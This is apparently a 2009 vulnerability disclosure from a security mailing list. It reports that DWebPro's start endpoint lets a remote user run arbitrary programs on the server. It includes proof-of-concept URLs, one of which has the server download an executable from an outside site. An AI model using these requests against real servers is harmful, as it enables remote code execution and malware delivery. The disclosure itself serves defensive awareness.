Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Insufficient Anti-automation and Abuse of Functionality vulnerabilities in ALFcontact for Joomla

From:rafa.de.sousa_(at)_hotmail.com <rafa.de.sousa_(at)_hotmail.com>
Date:17.10.2009
Subject:DWebPro allow an invader to execute any program at server side

The last version of DWebPro allows an invader to execute any program. Just hit this at your browser:

http://127.0.0.1:8080/dwebpro/start?file=C:\windows\system32\notepad.
exe&params=C:\hi.txt

And the notepad.exe will open a txt file that calls hi at C:\ server's side.

If you try this: http://127.0.0.1:8080/dwebpro/start?file=http://www.somesite.com.br/somefile.exe will open a browser at
server side and download the file.

It's really dangerous.

I tested this at last version but may work at older versions as well.

Best Regards,

Rafael Sousa

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server